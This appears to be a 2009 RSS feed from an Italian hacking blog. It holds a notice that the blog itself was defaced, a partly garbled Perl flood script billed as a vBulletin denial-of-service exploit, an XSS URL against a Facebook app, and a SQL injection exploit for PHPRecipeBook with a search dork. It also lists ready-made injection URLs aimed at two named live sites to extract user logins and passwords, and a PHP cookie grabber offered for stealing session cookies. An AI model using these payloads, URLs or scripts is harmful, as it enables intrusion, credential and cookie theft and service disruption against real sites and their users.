<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>pWnt By Securityspl0its-Forums</title>
	<atom:link href="http://nj3ctor.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://nj3ctor.wordpress.com</link>
	<description>www.anonymousite.altervista.org/board</description>
	<lastBuildDate>Thu, 30 Jul 2009 00:27:30 +0000</lastBuildDate>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='nj3ctor.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>pWnt By Securityspl0its-Forums</title>
		<link>http://nj3ctor.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://nj3ctor.wordpress.com/osd.xml" title="pWnt By Securityspl0its-Forums" />
	<atom:link rel='hub' href='http://nj3ctor.wordpress.com/?pushpress=hub'/>
		<item>
		<title>pWnt By l3d &amp; BlAcK HaT – Securityspl0its-Forums Community</title>
		<link>http://nj3ctor.wordpress.com/2009/07/30/pwnt-by-l3d-black-hat-%e2%80%93-securityspl0its-forums-community/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/30/pwnt-by-l3d-black-hat-%e2%80%93-securityspl0its-forums-community/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 00:27:30 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[black hat]]></category>
		<category><![CDATA[deface]]></category>
		<category><![CDATA[l3d]]></category>
		<category><![CDATA[securityspl0its-forums]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=38</guid>
		<description><![CDATA[Heila nj3ctor il tuo lamero blog è stato appena defacciato Motivi: rips e altro pWnt By l3d &#38; BlAcK HaT &#8211; Securityspl0its-Forums http://anonymousite.altervista.org/board/index.php<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=38&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter" src="http://img198.imageshack.us/img198/112/hackedm.jpg" alt="null" /></p>
<p>Heila nj3ctor il tuo lamero blog è stato appena defacciato <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Motivi: rips e altro</p>
<p>pWnt By l3d &amp; BlAcK HaT &#8211; Securityspl0its-Forums</p>
<p><a href="http://anonymousite.altervista.org/board/index.php">http://anonymousite.altervista.org/board/index.php</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/38/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=38&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/30/pwnt-by-l3d-black-hat-%e2%80%93-securityspl0its-forums-community/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>

		<media:content url="http://img198.imageshack.us/img198/112/hackedm.jpg" medium="image">
			<media:title type="html">null</media:title>
		</media:content>
	</item>
		<item>
		<title>* vBulletin® Version 3.8.2 Denial of Service Exploit</title>
		<link>http://nj3ctor.wordpress.com/2009/07/10/vbulletin%c2%ae-version-3-8-2-denial-of-service-exploit/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/10/vbulletin%c2%ae-version-3-8-2-denial-of-service-exploit/#comments</comments>
		<pubDate>Fri, 10 Jul 2009 18:44:25 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[spl0itz]]></category>
		<category><![CDATA[Webappsec]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[vBulletin]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=35</guid>
		<description><![CDATA[###################################### if (@ARGVvBulletin® Version 3.8.2); chomp($ziel =); if ($ziel eq&#8221;"){ die &#8220;$fehler\a\n&#8221;;} print&#8221;$block\n&#8221;; print&#8221;$block\n&#8221;; print q(Path-&#62;); chomp($path =); if ($path eq &#8220;&#8221;) { die &#8220;$fehler !\a\n&#8221;;} print&#8221;$block\n&#8221;; print&#8221;$block\n&#8221;; print &#8220;Verwundbarkeit\n&#8221;; print&#8221;forumdisplay.php?f=\n&#8221;; print&#8221;-&#62;&#8221;n; chomp($vul =); if ($vul eq &#8220;&#8221;) { die &#8220;$fehler !\a\n&#8221;;} print&#8221;$block\n&#8221;; print&#8221;$block\n&#8221;; print q(Time-&#62;); chomp($flood =); if ($flood eq &#8220;&#8221;) { die &#8220;$fehler [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=35&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<blockquote><p>######################################<br />
if (@ARGVvBulletin® Version 3.8.2);<br />
     chomp($ziel =);<br />
     if ($ziel eq&#8221;"){<br />
     die &#8220;$fehler\a\n&#8221;;}<br />
     print&#8221;$block\n&#8221;;<br />
       print&#8221;$block\n&#8221;;<br />
       print q(Path-&gt;);<br />
       chomp($path =);<br />
       if ($path eq &#8220;&#8221;) {<br />
       die &#8220;$fehler !\a\n&#8221;;}<br />
       print&#8221;$block\n&#8221;;<br />
          print&#8221;$block\n&#8221;;<br />
          print &#8220;Verwundbarkeit\n&#8221;;<br />
          print&#8221;forumdisplay.php?f=\n&#8221;;<br />
          print&#8221;-&gt;&#8221;n;<br />
            chomp($vul =);<br />
            if ($vul eq &#8220;&#8221;) {<br />
            die &#8220;$fehler !\a\n&#8221;;}<br />
            print&#8221;$block\n&#8221;;<br />
               print&#8221;$block\n&#8221;;<br />
               print q(Time-&gt;);<br />
               chomp($flood =);<br />
               if ($flood eq &#8220;&#8221;) {<br />
               die &#8220;$fehler !\a\n&#8221;;}<br />
                  print&#8221;$block\n&#8221;;<br />
                  print&#8221;$block\n&#8221;;<br />
                  print q(Port-&gt;);<br />
                  chomp($port =);<br />
                  if ($port eq &#8220;&#8221;){<br />
                  die &#8220;$fehler \n&#8221;;}<br />
                  print&#8221;$block\n&#8221;;<br />
                     print q(Send &#8220;start&#8221;-&gt;);<br />
                     chomp($start =);<br />
                     if ($start eq &#8220;&#8221;) {<br />
                     die &#8220;$fehler\n&#8221;;}<br />
print &#8220;$block\a\n&#8221;;<br />
print &#8220;[+]Konntroliere Daten \n&#8221;;<br />
print &#8220;[*]Kontroliere Ziel   : $ziel\n&#8221;;<br />
print &#8220;[*]Kontroliere Board  : $path\n&#8221;;<br />
print &#8220;[*]Kontroliere Port   : $port\n&#8221;;<br />
print &#8220;$block\n&#8221;;<br />
if($start == 1){<br />
while($x != 0000){<br />
$x++;}<br />
}elsif ($start == start){<br />
while($x != $flood)<br />
{<br />
$postit = &#8220;$ziel&#8221;.&#8221;$path&#8221;.&#8221;$vul&#8221;;<br />
$lrg = length $postit;<br />
$sock = new IO::Socket::INET (<br />
                               PeerAddr =&gt; &#8220;$ziel&#8221;,<br />
                               PeerPort =&gt; &#8220;$port&#8221;,<br />
                               Proto =&gt; &#8220;tcp&#8221;,<br />
                              );</p>
<p>print $sock &#8220;POST $path$vul HTTP/1.1\n&#8221;;<br />
print $sock &#8220;Host: $ziel\n&#8221;;<br />
print $sock &#8220;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n&#8221;;<br />
print $sock &#8220;Referer: $ziel\n&#8221;;<br />
print $sock &#8220;Accept-Language: en-us\n&#8221;;<br />
print $sock &#8220;Content-Type: application/x-www-form-urlencoded\n&#8221;;<br />
print $sock &#8220;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n&#8221;;<br />
print $sock &#8220;Content-Length: $lrg\n\n&#8221;;<br />
print $sock &#8220;$postit\n&#8221;;<br />
close($sock);<br />
syswrite STDOUT, &#8220;-&gt;BLACKOUT&lt;-&quot;;<br />
$x++;<br />
}<br />
}else{<br />
die &quot;Fehler kann nicht zum Ziel verbinden $ziel !\n&quot;;<br />
}</p></blockquote>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/35/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=35&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/10/vbulletin%c2%ae-version-3-8-2-denial-of-service-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>apps.facebook.com XSS Vulnerability</title>
		<link>http://nj3ctor.wordpress.com/2009/07/07/apps-facebook-com-xss-vulnerability/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/07/apps-facebook-com-xss-vulnerability/#comments</comments>
		<pubDate>Tue, 07 Jul 2009 00:30:05 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Social Network]]></category>
		<category><![CDATA[XSS (Attacks)]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=33</guid>
		<description><![CDATA[Sito XSSed: facebook.com XSS: http://apps.facebook.com/flixville/search/?locale=US&#38;searchText=%22%3E%3Cfont%20size=70%20color=red% 3EXSSed%20by%20Uber0n Autore: Uber0n Status: UNFIXED<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=33&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sito XSSed:<br />
<a href="http://facebook.com">facebook.com</a></p>
<p>XSS:<br />
<a href="http://apps.facebook.com/flixville/search/?locale=US&amp;searchText=%22%3E%3Cfont%20size=70%20color=red% 3EXSSed%20by%20Uber0n">http://apps.facebook.com/flixville/search/?locale=US&amp;searchText=%22%3E%3Cfont%20size=70%20color=red%<br />
3EXSSed%20by%20Uber0n</a></p>
<p>Autore:<br />
<em>Uber0n</em></p>
<p>Status:<br />
<strong>UNFIXED</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/33/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=33&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/07/apps-facebook-com-xss-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>PHPRecipeBook</title>
		<link>http://nj3ctor.wordpress.com/2009/07/06/phprecipebook/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/06/phprecipebook/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 23:33:21 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Security Web]]></category>
		<category><![CDATA[spl0itz]]></category>
		<category><![CDATA[Webappsec]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[PHPRecipeBook]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[wepappsec]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=25</guid>
		<description><![CDATA[Download PHPRecipeBook: http://phprecipebook.sourceforge.net/ spl0itz: http://www.milw0rm.com/exploits/8330 ////////////////////////////////////////////////////////////////////// ////////////////////////////1923TURK &#8211; GRUP/////////////////////////// ////////////////////////////////////////////////////////////////////// ***************************************************** [!] Script : PHPRecipeBook [!] Verison : 2.39 [!] Download : http://sourceforge.net/projects/phprecipebook/ [-] Bugs : Remote SQL injection Exploit [-] Dork : inurl:&#8221;/index.php?m=&#8221; &#8220;PHPRecipeBook 2.39&#8243; [-] Date : 31-03-09(19:33) [+] Author : DarKdewiL [+] GroupWeb : www.1923turk.biz [-] Contact : darkdewil@1923turk.biz [!] Note : [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=25&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Download PHPRecipeBook: http://phprecipebook.sourceforge.net/</p>
<p>spl0itz: http://www.milw0rm.com/exploits/8330</p>
<blockquote><p>//////////////////////////////////////////////////////////////////////<br />
////////////////////////////1923TURK &#8211; GRUP///////////////////////////<br />
//////////////////////////////////////////////////////////////////////<br />
*****************************************************<br />
[!] Script : PHPRecipeBook<br />
[!] Verison : 2.39<br />
[!] Download : http://sourceforge.net/projects/phprecipebook/</p>
<p>[-] Bugs : Remote SQL injection Exploit<br />
[-] Dork : inurl:&#8221;/index.php?m=&#8221; &#8220;PHPRecipeBook 2.39&#8243;<br />
[-] Date : 31-03-09(19:33)<br />
[+] Author : DarKdewiL<br />
[+] GroupWeb : www.1923turk.biz<br />
[-] Contact : darkdewil@1923turk.biz</p>
<p>[!] Note : Always use the time you have to finish your work.<br />
  Never leave it to the last minute.<br />
  Once time goes away, it never comes back</p>
<p>*****************************************************<br />
//////////////////////////////////////////////////////////////////////<br />
*****************************************************<br />
[-- Bugs --]</p>
<p>(+)</p>
<p>/index.php?m=recipes&amp;a=search&amp;search=yes&amp;course_id=[SQLEXP]</p>
<p>[-- SQL EXPLOIT --]</p>
<p>Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;<br />
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users&#8211;</p>
<p># milw0rm.com [2009-03-31]</p></blockquote>
<p>Ecco due siti vulnerabili:<br />
http://www.lowcarbrecipes.org/index.php?m=recipes&amp;a=search&amp;search=yes&amp;base_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (nomi utenti)</p>
<p>http://www.lowcarbrecipes.org/index.php?m=recipes&amp;a=search&amp;search=yes&amp;base_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (password utenti)<br />
&#8212;<br />
http://ww.cseworks.com/index.php?m=recipes&amp;a=search&amp;search=yes&amp;course_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (nomi utenti)</p>
<p>http://ww.cseworks.com/index.php?m=recipes&amp;a=search&amp;search=yes&amp;course_id=<strong>-7+union+select+1,user_password,3,4,5,6,7+from+security_users&#8211;</strong> (password utenti)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/25/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=25&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/06/phprecipebook/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>Difendersi dalle XSS (solo info)</title>
		<link>http://nj3ctor.wordpress.com/2009/07/05/difendersi-dalle-xss-solo-info/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/05/difendersi-dalle-xss-solo-info/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 18:02:37 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[Security Web]]></category>
		<category><![CDATA[XSS (Defense)]]></category>
		<category><![CDATA[difesa]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=22</guid>
		<description><![CDATA[In questo articolo mi limiterò a far capire ai webmaster e agli utenti di un sito come difendersi dalle XSS. Per quanto riguarda gli sviluppatori dovranno controllare ogni informazione inserita in input dagli utenti prima di inoltrarla alle proprie applicazioni. Per quanto riguarda gli utenti non dovranno fare altro che tenere aggiornati i loro browser [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=22&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>In questo articolo mi limiterò a far capire ai webmaster e agli utenti di un sito come difendersi dalle XSS.</p>
<p>Per quanto riguarda gli sviluppatori dovranno controllare ogni informazione inserita in input dagli utenti prima di inoltrarla alle proprie applicazioni.</p>
<p>Per quanto riguarda gli utenti non dovranno fare altro che tenere aggiornati i loro browser poiché oramai ognuno di essi ha il blocco di script in JavaScript, VBScript e ActiVix.</p>
<p>(Info su come proteggersi dalle XSS)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/22/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=22&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/05/difendersi-dalle-xss-solo-info/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/64a57892d42a57f2145222bcb8e8e942?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">nj3ctor</media:title>
		</media:content>
	</item>
		<item>
		<title>Cookie grabber</title>
		<link>http://nj3ctor.wordpress.com/2009/07/05/cookie-grabber/</link>
		<comments>http://nj3ctor.wordpress.com/2009/07/05/cookie-grabber/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 17:51:45 +0000</pubDate>
		<dc:creator>nj3ctor</dc:creator>
				<category><![CDATA[XSS (Attacks)]]></category>
		<category><![CDATA[cookie grabber]]></category>
		<category><![CDATA[grabbing]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://nj3ctor.wordpress.com/?p=19</guid>
		<description><![CDATA[Esempio di cookie grabber da utilizzare se la XSS da voi trovata su un sito sia grabbante e che quindi possiate rubare dei cookie: &#60;?php $cookie = $_GET[&#39;c&#39;]; $ip = getenv (&#39;REMOTE_ADDR&#39;); $date=date(&#34;j F, Y, g:i a&#34;); $referer=getenv (&#39;HTTP_REFERER&#39;); $fp = fopen(&#39;file.txt&#39;, &#39;a&#39;); fwrite($fp, &#39;Cookie: &#39;.$cookie.&#39; IP: &#8216; .$ip. &#8216; Date and Time: &#8216; .$date. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=19&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Esempio di cookie grabber da utilizzare se la XSS da voi trovata su un sito sia grabbante e che quindi possiate rubare dei cookie:</p>
<blockquote><p>&lt;?php<br />
$cookie = $_GET[&#39;c&#39;];<br />
$ip = getenv (&#39;REMOTE_ADDR&#39;);<br />
$date=date(&quot;j F, Y, g:i a&quot;);<br />
$referer=getenv (&#39;HTTP_REFERER&#39;);<br />
$fp = fopen(&#39;file.txt&#39;, &#39;a&#39;);<br />
fwrite($fp, &#39;Cookie: &#39;.$cookie.&#39;<br /> IP: &#8216; .$ip. &#8216;<br /> Date and Time: &#8216; .$date. &#8216;<br /> Referer: &#8216;.$referer.&#8217;</p>
<p>&#8216;);<br />
fclose($fp);</p></blockquote>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/nj3ctor.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/nj3ctor.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/nj3ctor.wordpress.com/19/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=nj3ctor.wordpress.com&amp;blog=8437714&amp;post=19&amp;subd=nj3ctor&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://nj3ctor.wordpress.com/2009/07/05/cookie-grabber/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
